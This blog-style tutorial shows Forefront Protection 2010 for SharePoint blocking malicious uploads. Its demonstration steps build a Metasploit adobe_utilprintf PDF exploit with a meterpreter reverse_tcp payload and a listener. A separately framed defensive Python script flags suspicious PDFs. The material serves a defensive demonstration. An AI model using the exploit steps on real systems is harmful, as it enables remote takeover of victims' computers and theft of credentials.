These days many organizations are trying to take full advantage of SharePoint, and it draws money out of their pockets. A document management system is invariably one of the first things they consider, and one of the key components of any document management system is security. The security of a document management system comes from many different things: it might be a consideration of how documents are shared internally across the company, or the protection of the document store from threats coming from the Internet. IT departments have been designing and planning practical security solutions that can protect documents on both the intranet and the extranet.

From an intranet perspective, building a typical Active Directory model is worth considering. Active Directory Domain Services has been designed to make managing users and computers easier. Additionally, Active Directory helps enforce security policies and makes it easy to install critical patches or hotfixes on all client computers joined to the AD environment. To protect client computers and servers, the IT department has installed antivirus client and server applications. However, imagine an end-user who is using a friend's computer in an extranet environment and uploads a document to a shared document library in SharePoint without knowing that it is infected. What happens after the upload? I don't think the antivirus application installed on the SharePoint server can detect the infected document during the upload process. And once the infected document has been completely uploaded to the SharePoint server, can the scanning engine installed on the SQL Server scan deeply into the structured data of the infected document? That is the question you may come up with.

Is there any tool that can scan a document in real time and detect an infection while it is being uploaded? My immediate answer is Forefront Protection 2010 for SharePoint.

As many of you may have heard, Forefront Protection 2010 for SharePoint (FPSP) provides a powerful shield that prevents end-users from uploading infected documents to SharePoint document libraries and from downloading them. You may find it remarkable that FPSP combines multiple anti-malware scanning engines developed by major computer security companies, one of which is the green giant, Kaspersky.

[Image] Engines available in Forefront Protection 2010 for SharePoint

So what is the purpose of this post?

Imagine you are working as a SharePoint administrator in a financial services company. Your company has implemented a document management system based on SharePoint 2010. Symantec software is installed on all client computers joined to the corporate network; once it detects malware on a computer, Symantec deletes it immediately. Sounds good? One day, an accountant reports to the IT department that she has lost the password of a bank account. After an investigation, you find out that the accountant used her personal computer at home to log in to a web-based banking application. After downloading a financial document from a SharePoint library to her computer, she opened the document and entered information from it into a web form on the bank's website. After that, she lost the password. You have read about the capabilities of Forefront Protection 2010 for SharePoint and now you really want to propose a solution to your CFO, who has never cared about the threats or vulnerabilities she may face from the Internet, because she thinks her computer is protected by Symantec software updated with the latest patches. However, when you ask the accountant for the financial document you think is infected with malware, she says she can't find it. Hence, one thing you can do is create an infected document yourself and then demonstrate to your CFO how Forefront Protection 2010 for SharePoint blocks it. That is what I would like to write about in this post.

This post consists of two parts:

  • Create an infected document with the Metasploit tool.
  • Show the CFO how FPSP 2010 blocks the infected document.

Metasploit Framework (MSF) is one of the redoubtable security and hacking tools. It enables attackers to develop malware scripts in order to exploit IT systems through vulnerabilities. Metasploit is used broadly by security professionals as well as by those I would call "script kiddies." To learn more about MSF, here you go:

In this section, I'm going to create a malware script and inject it into a *.pdf file. When an end-user opens this file, the malware script executes and immediately establishes a connection between the attacker's computer and the end-user's computer. To build a test environment, make sure you have BackTrack 5 R2 installed in a virtual machine (or on a physical computer).

Open MSF: at the # prompt, type msfconsole

Type the following commands to create a *.pdf file that includes a malware script exploiting the 'util.printf()' JavaScript function stack vulnerability in Adobe Reader.

I use the command use exploit/windows/fileformat/adobe_utilprintf to exploit the 'util.printf()' vulnerability, assuming the Adobe Reader installed on the client computer is version 9. I have seen many organizations that have not upgraded to the latest Adobe Reader build, so this may be a gap left open to attackers. The command set FILENAME Financial Analysis Quater 4.pdf names the infected document. The command set PAYLOAD windows/meterpreter/reverse_tcp makes the payload open a TCP connection to the attacker's computer for the subsequent steps. In this case, when the Financial Analysis Quater 4.pdf document is opened, a TCP connection between the attacker's computer and the victim is established immediately. After that, I set the IP address of the attacker's computer and the port that listens for the TCP connection established from the victim's computer.

Note: use show options to review all settings and parameters.

The next step is to run the exploit; the generated file is found under /pentest/exploits/framework3/data/exploits/. Then use the following command to set up a listener on the attacker's computer to receive the connection from the victim's computer.
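For the defender's side of this step, here is a small upload-gate triage script. It is an added example, not FPSP's engine or the author's code: it checks a PDF for the structural markers that make a document like the one above suspicious (an /OpenAction or /AA trigger, a /JS or /JavaScript action, and a reference to the util.printf API), inflating FlateDecode streams so the markers cannot be hidden by compression. The MARKERS list, the verdict rules and the sample PDFs are my own constructions.

```python
import re
import zlib

# Name tokens worth counting at the upload gate. PDF names may be hex-escaped
# (/J#53 is /JS), so escapes are normalised before matching.
MARKERS = ("/OpenAction", "/AA", "/JS", "/JavaScript", "/Launch", "/EmbeddedFile")

def _unescape_names(data: bytes) -> bytes:
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)

def _inflate_streams(data: bytes) -> bytes:
    out = []  # bodies of every stream that inflates as FlateDecode data
    for m in re.finditer(rb"stream\r?\n(.*?)endstream", data, re.S):
        try:  # decompressobj tolerates the whitespace that precedes 'endstream'
            out.append(zlib.decompressobj().decompress(m.group(1)))
        except zlib.error:
            pass  # not Flate (or damaged): the raw bytes are still searched
    return b"\n".join(out)

def triage_pdf(data: bytes) -> dict:
    """Count the markers and return a verdict: allow, review or block."""
    body = _unescape_names(data + b"\n" + _inflate_streams(data))
    counts = {n: len(re.findall(re.escape(n.encode()) + rb"(?![A-Za-z])", body))
              for n in MARKERS}
    has_js = counts["/JS"] + counts["/JavaScript"] > 0
    auto_trigger = counts["/OpenAction"] + counts["/AA"] > 0  # runs on open
    api_hit = b"util.printf" in body  # the Reader 9 API the post exploits
    if has_js and (auto_trigger or api_hit):
        verdict = "block"
    elif has_js or counts["/Launch"] or counts["/EmbeddedFile"]:
        verdict = "review"
    else:
        verdict = "allow"
    return {"counts": counts, "util.printf": api_hit, "verdict": verdict}

# Constructed samples (not real exploit files): a skeleton whose OpenAction
# points at a JavaScript action, the same skeleton with the action hidden in a
# Flate stream, and a clean skeleton.
_JS_OBJ = b"3 0 obj << /S /JavaScript /JS (util.printf('%d', 1)) >> endobj\n"
_HEAD = b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
SAMPLE_SUSPICIOUS = _HEAD + _JS_OBJ + b"trailer << /Root 1 0 R >>\n%%EOF\n"
SAMPLE_COMPRESSED = (_HEAD + b"4 0 obj << /Filter /FlateDecode >>\nstream\n"
                     + zlib.compress(_JS_OBJ) + b"\nendstream\nendobj\n%%EOF\n")
SAMPLE_CLEAN = b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n%%EOF\n"

if __name__ == "__main__":
    for label, pdf in (("suspicious", SAMPLE_SUSPICIOUS),
                       ("compressed", SAMPLE_COMPRESSED), ("clean", SAMPLE_CLEAN)):
        print(label, triage_pdf(pdf)["verdict"])
```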

Next, I will install Forefront Protection 2010 for SharePoint.

Download Forefront Protection 2010 for SharePoint here

Check out the Forefront Protection 2010 for SharePoint requirements

The FPSP installation steps are easy. Make sure your account has the right permissions and SQL Server roles, as instructed during installation. The following image illustrates my logical topology: Forefront Protection 2010 for SharePoint is installed on the web front-end server in my SharePoint environment. I have also included some small figures in the image.

I have created a site collection using the Team Site template for the demonstration, with the default Shared Documents library. Let me upload the infected document I created and see how it goes. The image below shows the upload failing, because Forefront Protection 2010 for SharePoint detected the infected document and blocked it.

As a SharePoint administrator, you need to know what happened when you see such an image. Open the Forefront Protection 2010 for SharePoint administration interface; under Server Security Views, click Incidents and check the Detection Details tab.

Looks good?

To show a simple scenario of how Forefront Protection 2010 for SharePoint detects infected documents and prevents users from uploading them, I created an infected document and tried to upload it to a SharePoint document library. The upload failed, thanks to Forefront Protection 2010 for SharePoint.